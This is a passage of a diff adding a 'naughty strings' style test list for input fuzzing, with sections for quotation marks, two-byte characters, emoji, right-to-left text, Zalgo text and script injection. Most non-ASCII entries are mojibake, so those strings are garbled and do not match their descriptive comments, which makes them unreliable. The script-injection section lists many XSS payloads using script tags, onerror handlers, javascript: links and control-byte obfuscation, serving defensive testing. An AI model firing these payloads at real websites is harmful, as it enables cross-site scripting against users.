"¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢" + "ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ" + "¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ", + + // Quotation Marks + // + // Strings which contain misplaced quotation marks; can cause encoding errors + + "'", "\"", "''", "\"\"", "'\"'", "\"''''\"'\"", "\"'\"'\"''''\"", "<foo val=¬タワbar¬タン />", "<foo val=¬タワbar¬タン />", "<foo val=¬タンbar¬タワ />", + "<foo val=`bar' />", + + // Two-Byte Characters + // + // Strings which contain two-byte characters: can cause rendering issues or character-length issues + + "ヤᄚ¦ᄌᆳ ̄チユ ̄ツモ ̄チᆱ ̄チツ ̄チメ ̄チᆭ¦ᄌヒ ̄チユ ̄チト", " ̄テム ̄テᄐ ̄テニ ̄ツᆪ ̄テᄐ ̄チᄌ│ᄀフ ̄チヒ ̄チᆰ ̄チト ̄チヒ", + "¥メフ│ᆪᄑ₩ᄐᄁ│ᆰ゙", "←テᄄ│ミᄑ₩ᅠᄐ", "↓ツᆲ■レフ↑ᄈᄐ■ユル↓ロミ ↓ヨᄡ■ユル↓ラᄚ↑ᄉᆲ↓ニフ", + 
"↓ᄚᆭ↓ᄚᄄ→ᆬᄐ ■テタ↑ᄈᅠ ↓リᄄ ■ホᄇ↓ヒワ→ᄃᄄ↑ᄈᄐ ↓ムロ→ヒᄂ→ᆭᆲ " + "→リᅠ→ᄚᄅ↑ᄚチ■ユリ", + "ᄂᄒ₩ワテᄃム¥ᆳᄌ←ルᄁ│ᆰ゙¥ᆳᄌᅠヤᄅᄊ₩ノタ", "↓レᄌ→゙タ→ᄚヤ■ニᅠ→ᆬᄡ", + "ᅠワホᅠワᄆᅠンᄍᅠᄆモᅠᄆᄌᅠᄇヨᅠᄈマ", + + // Changing length when lowercased + // + // Characters which increase in length (2 to 3 bytes) when lowercased + // Credit: https://twitter.com/jifa/status/625776454479970304 + + "ᄎ", "ᄒ", + + // Japanese Emoticons + // + // Strings which consists of Japanese-style emoticons which are popular on the web + + " ̄テᄑ¢ᄐᄐ¢ᄎネトᅪワ¢ᄎネ¢ᄐᄑᄒノ  ̄テᄑ¢ᄐᄐ¢ᄎネトᅪワ¢ᄎネ¢ᄐᄑᄒノ", + "(ᄑᄀ¬ラユ ¬ネタ ¬ラユᄑᄀ)", "ᄑタᄑᄄ(ᅡᄡ¬ネタᄑタ¬ネᄅ", "__ᄒロ(,_,*)", + " ̄テᄏ(ᆪ¬ネタᆪ) ̄テᄏ:*:", + "ᄒ゚ᄑᆬ¬ワ ̄テᄒ¬ユᄇ(ᄑᄀ¬ラユ¬タ¬ラユᄑᄀ)¬ユᄆ¬ワᄑᆬᄒ゚", + ", ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル( ¬リᄏ ᅬノ ¬リᄏ ) ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル", + "(¬ユᆵᅡᄚ¬ヨ가ᄚᄐノ¬ユᆵᄌᄉ ¬ヤᄏ¬ヤチ¬ヤᄏ)", + "(ᄒノ¢ᄇᆬロハ¢ᄇᆬᄐノᄒノᄏ ¬ヤᄏ¬ヤチ¬ヤᄏ", "¬ヤᆲ¬ヤタ¬ヤᆲ ̄テホ( ᅡᄎ _ ᅡᄎ ̄テホ)", "( ᅪ가ᄚ ᅪワᅧヨ ᅪ가ᄚ)", + + // Emoji + // + // Strings which contain Emoji; should be the same behavior as two-byte characters, but not always + + "゚リヘ", "゚ムᄅ゚マᄑ", "゚ムᄒ ゚ルヌ ゚メチ ゚ルナ ゚ルニ ゚ルヒ ゚ルホ ゚ルヘ", + "゚ミᄉ ゚ルネ ゚ルノ ゚ルハ", + "¬ンᄂᄌマ ゚メヤ ゚メフ ゚メユ ゚メ゙ ゚メモ ゚メラ ゚メヨ ゚メリ ゚メン ゚メ゚ ゚メワ ゚メロ ゚メレ " + "゚メル", + "¬ワピマ ゚メᆰ゚マ ゚ムミ゚マ ゚ルプマ ゚ムマ゚マ ゚ルマ゚マ", + "゚レᄒ ゚ニメ ゚ニモ ゚ニユ ゚ニヨ ゚ニラ ゚ニル ゚マᄃ", + "0ᄌマ¬テᆪ 1ᄌマ¬テᆪ 2ᄌマ¬テᆪ 3ᄌマ¬テᆪ 4ᄌマ¬テᆪ 5ᄌマ¬テᆪ 6ᄌマ¬テᆪ 7ᄌマ¬テᆪ 8ᄌマ¬テᆪ 9ᄌマ¬テᆪ " + "゚ヤ゚", + + // Regional Indicator Symbols + // + // Regional Indicator Symbols can be displayed differently across + // fonts, and have a number of special behaviors + + "゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ ゚ヌᆭ゚ヌᆱ゚ヌᆭ゚ヌᄇ゚ヌᄌ", + "゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ゚ヌᆭ゚ヌᆱ゚ヌᆭ゚ヌᄇ", + "゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ゚ヌᆭ", + + // Unicode Numbers + // + // Strings which contain unicode numbers; if the code is localized, it should see the input as numeric + + "ᄐムᄐメᄐモ", "ᄀᄁᆪ", + + // Right-To-Left Strings + // + // Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew) + + "ᆱナ ニチᄈ ᄈツᄋᆰ ネᄄᄃトᆰᆳᆵハᆵフ, ᆲᄇハᄆᆰハ ᄄᄃᄈᆰᆴᆵᄃナ ᆪニ " + "ᆵニネ. ᆬᄚ ヌニᄃ゚ ᄃトᄈᆰᄃᄆ ネᆰニᄉハᄄ テᄃニ. ᆪヌムト ᄃハᄋᄃトハᄃフ " + "ᄄᄆハᄋᄃニハᄃ-チᄆニᄈᄃ ツᆵ ᆪᆴᄚ. 
ᄈトハナᄃニフ ᆬᆰチᄃツハᄅ ᄄハニ " + "ナᄃ, ハᄚテᄆ ᄃトᆳᆵネᆵ ᆪハ ᄄᄍᆵ, ナᄍᄃナトᄅ ᄄネトニᆵᄃフ " + "ᄃトᆬᄋトᄃツ ᄍト ᆬハネ.", + "ᅲムᅱᄚᅱ튜뛰슈ミᅲ뤼ᄡᅲチᅲルᅲᆰ, ᅲムᅱ쥐튜뛰쥬ミ ᅲミᅱ뮤ワᅱ쮸ヤᅱᄡᅲルᅲン, ᅲミᅱ슑 ᅲヤᅱ유뤼쥐튜チᅲ゙ᅱ유ルᅱᄡᅲン, ᅲユᅱᄚᅲミᅱ슑 ᅲヤᅱ쥬ミᅱ쥬뛰쓙", + "ᅲヤᅱ쥬ルᅱᄚᅲᆰᅱ쥬ヤtestᄃトᄉチᆳᄃᆰ ᄃトᆰムᆳネト", "ᄋᄑ", + "ᄋᄎ", + "ナマニホᄃツホᄡホᄅマ ᄈマᄄマトミ ᄃミᄈメᆰミᆴメᆵホᄃナミ " + "ᄃトトムマᄎホᄅミ チミハ ᄃトニムマᄌマナミ ᄃトメツホᄃᆭミナホᄅミ " + "ネホチミハナ ハホᆴマᄉムホ ᄃトᆰムホᄋメᄄミハツホᄃᆰマ " + "ᄃトメᆳᄃᄈマネᄄミハムホᄅマフ ", + + // Trick Unicode + // + // Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf) + + "¬タᆰ¬タᆰtest¬タᆰ", "¬タᆱtest¬タᆱ", "¬タᄅtest¬タᄅ", "test¬チᅠtest¬タᆱ", "¬チᆭtest¬チᄃ", + + // Zalgo Text + // + // Strings which contain \"corrupted\" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net) + + "£ᄍᄚᅩ초초ユoᅪ゙ ᅩᄋiᅩ볿ᅪヌᅩᆰᅪルnᅩンᅩラᅪユvᅩ゚ᅩワᅩリᅩᆭᅪ゚oᅩ쏘ルᅩᄚᅩᅠkᅢ똬レᅩᆴᅩ촑ᅩ쪼모ᄂ ᅩヨtᅩンᅪユᅩ뽃ᅩ콝ᅪ゙hᅩ톼モᅩ볺ᅩ뽀リᅩᄇeᅪヌᅩᆪᅩᄚᅩᆭᅩᆲᅪホ " + "ᅩ꼬토코모リhᅪレᅪホᅪルᅩワᅩᆪᅩ봐ナiᅩᆭᅩ볷ᅩᄚᅩᄂvᅩ콰ヘeᅩ촔ᅩ뽉ᅩᄚ-mᅩᄁiᅪナnᅩヨᅩ초゙ᅩ봂ᅩᄚdᅩ소토゚ᅪルᅩ로토リᅩᄈ " + "ᅩ゙ᅩᆬᅩ모뽌rᅩロᅩラᅩリeᅪルpᅪᅠrᅩ토゙ᅩ콠ᅩラeᅩ초ᅠᅩᆪᅪ゚sᅩリᅪヌᅩ뽜ヘᅩンᅪノeᅪノᅩᆬᅩᆵᅩ゙ᅩ봐レᅩᆲᅪワᅦ쫇ᅪホᅪホᅩ゚ᅩヨᅪヌᅩᄂtᅪヘᅩᆲᅩ놔モᅩ톬ᅪリᅪナiᅩᆰᅩᄆnᅪᅠgᅩᄡᅪノ " + "ᅪマᅪノᅪナcᅩᆲᅩ゚hᅪᄀaᅩᆱᅩ콢ᅪリoᅩᆱᅩ゚ᅩヨᅪヘᅩルᅩンᅪノsᅩラᅩᆭᅩᄇ.ᅩ또쫘ネᅩᆪ", + "ᅩ과モᅩ゙ᅪナIᅩラᅩリᅩᆭᅪンnᅪヌᅪヌᅪルvᅩᆴᅩᆱokᅩ볾ᅩルᅪネiᅩヨᅪルᅩᆳᅩ쪼ᅠᅩ゙nᅩ고콡ᅩᆪᅩᄎgᅩ봐ネᅪルᅩᆳᅪルᅩᆲᅪホ ᅩᄚtᅪヤᅩᆭhᅩ゙ᅩᄇeᅩ꼬ᄂ " + "ᅪヘᅩᆲᅩ봐ヨfᅩᄡᅩリᅪユᅩᆪᅢ똬ヨ£ᄎ쫁ᅩᄅlᅪヨᅪヤᅪレiᅪモᅪレᅩᆭᅪᅠnᅪヨᅪヘᅩラᅪモᅩ뽍gᅪヘ ᅩᄄoᅪレᅩᆰᅪᄀfᅩリᅩᆪᅩᆲ " + "ᅩヨᅩリᅪヨᅩ゚ᅪルᅩᆴcᅭノᅪヤᅩᆱᅪヨᅪモᅪヌᅪヨᅪナhᅩ소녻ᅪレᅪヤᅢ고ラᅩ톼ユᅪナoᅩ톣ᅩᆬsᅩ뫄ネᅩ초ヨᅩᆭᅩ콰ᄁ." 
+ "ᅩロᅩヨᅩ゙ᅩᅠᅩᆱᅩᄚ", + "ᅩラᅩ촤ヨᅩ쫊ᅪモ£ᄍᆴᅩ놔ヘᅩᆬᅪヌᅪネhᅩ보チeᅪマᅪモᅩ토ラᅩルᅩ톣ᅪヤ " + "ᅪヌᅩワᅩ모ᅠᅪモᅪヘᅪナNᅪユᅪᅠeᅩラᅩᄆzᅩリᅩンᅩワᅩ촤ルpᅩ노초쫘ヘᅩᆵᅪレeᅩᅠᅩ코ᅠᅪワrᅩ또놔ヘᅩ초ヨᅪヤᅩヨᅩヨdᅩᅠᅩ゚ᅩᆳᅩᆲᅩンᅪ゚iᅩᆭᅪヨᅩ롸モᅪヤᅩᄂaᅩᅠᅩラᅩᆲᅪノᅩルnᅪレᅪワ " + "ᅩ코゙ᅩᄚᅪレᅪナhᅩ솨ノiᅩ뽀゙vᅩ꽈ヌ£ᄌルᅪホᅪ゚-ᅭノᅩᆳᅩ로톼ヤmᅩ놄ᅩᆱiᅪユᅪヌᅩンᅩᆭnᅩラᅪル£ᄌヘᅩ゚ ᅩᆵᅩ봐ユᅪ゙ᅦᆱᅩ゚ᅩᆵᅩᄚᅩ봐ルᅩ코ンf " + "ᅩᆰᅩᄚᅩᄚᅩラᅩヨᅩᆳᅩリᅪリcᅩᆭᅪヘᅩ보゙ᅪヘᅩ로ル£ᄌᆬᅪレaᅩᆴᅪホᅩ゚ᅩルᅪワᅥ고로쫘ホsᅩᄂ.ᅩンᅩン ᅭノZᅩ고ヨᅩワᅪヨᅩᄚᅩᆪᅪノᅩワaᅪヨᅩᄚᅪルᅩᆲᅪᄀlᅩ볾ᅩ뽜ヘᅩᄅgᅩ고゚ᅩ토뫄レᅩ゙ᅩᆲᅪナoᅩラᅪワ.ᅩ゚", + "ᅩᆭHᅩᆲᅩ노ラᅩ놔ンeᅪワ ᅩワᅩᆬᅩンᅩ콰ヘᅩ゚ᅩチwᅩユhᅩヨᅩᆵᅪモoᅩンᅪルᅩヨᅪホᅩ몵 ᅭノᅩ초ルᅩ゙ᅩ゚ᅪネWᅩ오톬aᅩ촑ᅪヘᅣᆵᅪネᅪユᅩᆳᅪルᅩᆵᅩワtᅩ쏘톭sᅩリᅪルᅪヨᅩユ " + "ᅩᅠᅩᆱᅩᅠBᅩ콰ヘᅪルᅪノᅩ뽜ナeᅩᄉhᅩ솗ᅪヌᅩᆱᅪルiᅩ쫘モᅩ뽀뽍ᅪホᅩᆱᅩユnᅪ゚dᅩᄡᅩᆰᅩワᅩヨ ᅩᄚᅪノᅩ롸ヌᅪルᅩ봐゙ᅪナTᅪヨᅩ톼モᅩᆰᅪᄁhᅪマᅪモᅩᆴᅩᄏeᅩᆲᅩンᅩ゚ᅪナ " + "ᅩ노쪼ンWᅪルᅩ゙ᅩンᅪヤᅪヌᅪンᅪナaᅪマᅪモᅪヤᅩ쪼톣lᅩᄡᅪヤᅩᄚᅩ노゚ᅪヤ£ᄌ폶.ᅪユ", + "Zᅩᆴᅩ゙ᅩᅠᅪルᅪヤᅪナ£ᄌタᅩラᅩ゙ᅪネᅩ코ラ£ᄌ쏴ルᅪホᅩᆵᅩ쪼゙ᅪモGᅩᄏOᅩᆳᅩラᅩᆴ", + + // Unicode Upsidedown + // + // Strings which contain unicode with an \"upsidedown\" effect (via http://www.upsidedowntext.com) + + "ᅨルミnb£ᄡノlミ ミuᅥテミᆵ ᅦンᄍolop ᅧヌᅦン ᅦンᄍoqミl ᅧヌn ᅧヌunp£ᄡノp£ᄡノヤu£ᄡノ ᄍodᆵᅦンᅧヌ poᆵsn£ᄡノᅦン op pᅦンs 'ᅧヌ£ᄡノlᅦン " + "ᅥテu£ᄡノヤs£ᄡノd£ᄡノpミ ᄍnᅧヌᅦンᅧヌヤᅦンsuoヤ 'ᅧヌᅦンᆵミ ᅧヌ£ᄡノs ᄍolop ᆵnsd£ᄡノ " + "ᆵᅦンᄍoᅨᆬ", + "00ᅨルᅥヨ$-", + + // Unicode font + // + // Strings which contain bold/italic/etc. 
versions of normal characters + + "ᄐᄡᄑネᄑナ ᄑムᄑユᄑノᄑテᄑヒ ᄑツᄑメᄑマᄑラᄑホ ᄑニᄑマᄑリ ᄑハᄑユᄑヘᄑミᄑモ ᄑマᄑヨᄑナᄑメ ᄑヤᄑネᄑナ " + "ᄑフᄑチᄑレᄑル ᄑトᄑマᄑヌ", + "ンミモンミᄀンミ゙ ンミᆰンミᆴンミᄁンミワンミᄂ ンミロンミᆱンミᄄンミᄚンミᄃ ンミ゚ンミᄄンミᄆ ンミᆪンミᆴンミᆭンミᄅンミᆲ " + "ンミᄄンミᆵンミ゙ンミᆱ ンミᆳンミᄀンミ゙ ンミᆬンミレンミᄈンミᄇ " + "ンミンンミᄄンミᅠ", + "ンユンヨヘンヨハ ンヨヨンヨレンヨホンヨネンヨミ ンヨヌンヨランヨヤンヨワンヨモ ンヨヒンヨヤンヨン ンヨマンヨレンヨメンヨユンヨリ " + "ンヨヤンヨロンヨハンヨラ ンヨルンヨヘンヨハ ンヨムンヨニンヨ゚ンヨ゙ " + "ンヨノンヨヤンヨフ", + "ンムᄏンメノンメニ ンメメンメヨンメハンメトンメフ ンメテンメモンメミンメリンメマ ンメヌンメミンメル ンメヒンメヨンメホンメムンメヤ " + "ンメミンメランメニンメモ ンメユンメノンメニ ンメヘンメツンメロンメレ " + "ンメナンメミンメネ", + "ンモᆪンモᄆンモᆴ ンモᄎンモᄒンモᄇンモᆲンモᄡ ンモᆱンモᄏンモᄌンヤタンモᄋ ンモᆵンモᄌンヤチ ンモᄈンモᄒンモᄊンモᄍンモᄐ " + "ンモᄌンモンモᆴンモᄏ ンモᄑンモᄆンモᆴ ンモᄉンモᆰンヤテンヤツ " + "ンモᆳンモᄌンモᄚ", + "ンユヒンユルンユヨ ンユᄁンユᆭンユレンユヤンユワ ンユモンユᆪンユᅠンユᄄンユ゚ ンユランユᅠンユᄅ ンユロンユᆭンユ゙ンユᄀンユᄂ " + "ンユᅠンユᄃンユヨンユᆪ ンユᆬンユルンユヨ ンユンンユメンユᆱンユᆰ " + "ンユユンユᅠンユリ", + "ンレテンレムンレホ ンレレンレ゙ンレメンレフンレヤ ンレヒンレロンレリンレᅠンレラ ンレマンレリンレᄀ ンレモンレ゙ンレヨンレルンレワ " + "ンレリンレ゚ンレホンレロ ンレンンレムンレホ ンレユンレハンレᆪンレᄁ " + "ンレヘンレリンレミ", + "¬メᆵ¬メᆪ¬メᅠ ¬メᆲ¬メᄚ¬メᄂ¬メ゙¬メᆭ ¬メン¬メᆳ¬メᆰ¬メᄇ¬メᄅ ¬メᄀ¬メᆰ¬メᄈ ¬メᆬ¬メᄚ¬メᄄ¬メᆱ¬メᆴ ¬メᆰ¬メᄆ¬メᅠ¬メᆳ ¬メᆵ¬メᆪ¬メᅠ ¬メᄃ¬メワ¬メᄉ¬メᄡ " + "¬メ゚¬メᆰ¬メᄁ", + + // Script Injection + // + // Strings which attempt to invoke a benign script injection; shows vulnerability to XSS + + "<script>alert(123)</script>", "<script>alert('123');</script>", "<img src=x onerror=alert(123) />", + "<svg><script>123<1>alert(123)</script>", "\"><script>alert(123)</script>", "'><script>alert(123)</script>", "><script>alert(123)</script>", + "</script><script>alert(123)</script>", "< / script >< script >alert(123)< / script >", " onfocus=JaVaSCript:alert(123) autofocus", + "\" onfocus=JaVaSCript:alert(123) autofocus", "' onfocus=JaVaSCript:alert(123) autofocus", "ᄐワscriptᄐ゙alert(123)ᄐワ/scriptᄐ゙", + "<sc<script>ript>alert(123)</sc</script>ript>", "--><script>alert(123)</script>", "\";alert(123);t=\"", "';alert(123);t='", "JavaSCript:alert(123)", + ";alert(123);", "src=JaVaSCript:prompt(132)", "\"><script>alert(123);</script x=\"", "'><script>alert(123);</script x='", "><script>alert(123);</script x=", + "\" autofocus 
onkeyup=\"javascript:alert(123)", "' autofocus onkeyup='javascript:alert(123)",
+ "<script\\x20type=\"text/javascript\">javascript:alert(1);</script>", "<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>",
+ "<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>", "<script\\x09type=\"text/javascript\">javascript:alert(1);</script>",
+ "<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>", "<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>",
+ "<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>", "'`\"><\\x3Cscript>javascript:alert(1)</script>",
+ "'`\"><\\x00script>javascript:alert(1)</script>", "ABC<div style=\"x\\x3Aexpression(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:expression\\x5C(javascript:alert(1)\">DEF", "ABC<div style=\"x:expression\\x00(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:exp\\x00ression(javascript:alert(1)\">DEF", "ABC<div style=\"x:exp\\x5Cression(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:\\x0Aexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\x09expression(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\x0Dexpression(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:\\x0Cexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\x20expression(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\x00expression(javascript:alert(1)\">DEF",
+ "ABC<div 
style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:\\x0Bexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\">DEF",
+ "<a href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x1Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" 
id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x0Ajavascript:javascript:alert(1)\" 
id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", "`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>",
+ "`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>", "`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>",
+ "`\"'><img src=xxx:x \\x0Donerror=javascript:alert(1)>", "`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>",
+ "`\"'><img src=xxx:x \\x09onerror=javascript:alert(1)>", "`\"'><img src=xxx:x \\x0Conerror=javascript:alert(1)>",
+ "`\"'><img src=xxx:x \\x00onerror=javascript:alert(1)>", "`\"'><img src=xxx:x \\x27onerror=javascript:alert(1)>",
+ "`\"'><img 
src=xxx:x \\x20onerror=javascript:alert(1)>", "\"`'><script>\\x3Bjavascript:alert(1)</script>", "\"`'><script>\\x0Djavascript:alert(1)</script>",
+ "\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>",
+ "\"`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>", "\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>",
+ "\"`'><script>\\x09javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>",
+ "\"`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>",
+ "\"`'><script>\\x00javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>",
